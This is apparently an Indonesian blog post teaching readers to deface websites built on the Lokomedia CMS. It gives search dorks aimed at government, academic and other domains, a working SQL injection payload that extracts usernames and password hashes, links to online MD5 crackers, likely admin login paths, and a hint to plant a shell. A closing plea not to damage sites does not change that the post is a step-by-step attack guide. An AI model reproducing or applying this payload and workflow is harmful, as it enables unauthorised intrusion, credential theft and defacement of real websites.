Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini. Ga usah panjang lebar langsung ke topik pembahasan yaitu " Deface SQLi CMS Lokomedia"
Bahan :
1. Dork :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
Note : tambahkan site:org site:net :site:go.id site:ac.id site:id
(Use Your Brain)
2. Exploit SQLi (SQL Injection) :
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Bingung cara ngexploit nya ?? sini di kasih tau :v
contoh :
http://sitepemerintah.co.li/statis-2-profil.html
kamu tambahin exploit nya sesudah angka jadi kaya gini :
ngerti kan ??
3. MD5 Decrypter :
MD5 Decrypt nya pake otak kamu sendiri aja :v tenang ada tool online nya kokhttps://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
Tutorial :
1. Dorking pake dork di atas,2. Cari targetnya, setelah ketemu masukin inject nya ! seperti contoh di atas
3. Jika Vuln akan ada kode MD5 di tab bar (liat gambar aja biar jelas)
4. Lalu kamu pencet CTRL+U lalu kamu copykan kode MD5 tersebut, lalu decrypt di MD5 Decrypter
5. Tinggal cari dimana tempat login admin nya :) biasanya ada di :
http://target-suka.co.li/admin/
http://target-suka.co.li/adminweb/
http://target-suka.co.li/admininistrator/
6. Untuk Nanem shell ?? User Your Brain Kids !! (Jgn mau nya di suapin mulu)
Note : tapi saya sarankan sebelum melakukan inject terhadap target, lebih baik cari dlu login adminnya :)
Karena CMS Lokomedia ini dipakai oleh web indonesia, mohon bantuan untuk tidak merusak !!
Hargai Para webmaster tanah air ini.
0 Response to "Deface SQLi CMS Lokomedia"
Post a Comment